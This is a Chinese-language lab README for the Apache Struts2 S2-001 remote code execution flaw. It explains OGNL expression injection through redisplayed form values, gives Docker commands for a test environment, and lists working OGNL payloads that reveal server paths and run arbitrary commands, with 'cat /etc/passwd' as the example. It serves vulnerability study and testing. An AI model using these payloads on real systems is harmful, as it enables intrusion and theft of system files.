S2-001 遠程代碼執行漏洞

Path struts2/s2-001

原理

參考 http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html

該漏洞因為用戶提交表單數據并且驗證失敗時，后端會將用戶之前提交的參數值使用 OGNL 表達式 %{value} 進行解析，然后重新填充到對應的表單數據中。例如注冊或登錄頁面，提交失敗后端一般會默認返回之前提交的數據，由于后端使用 %{value} 對提交的數據執行了一次 OGNL 表達式解析，所以可以直接構造 Payload 進行命令執行

環境

執行以下命令啟動s2-001測試環境

docker-compose build
docker-compose up -d

POC && EXP

獲取tomcat執行路徑：

%{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}

獲取Web路徑：

%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close()}

執行任意命令（命令加參數：new java.lang.String[]{"cat","/etc/passwd"}）：

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"pwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}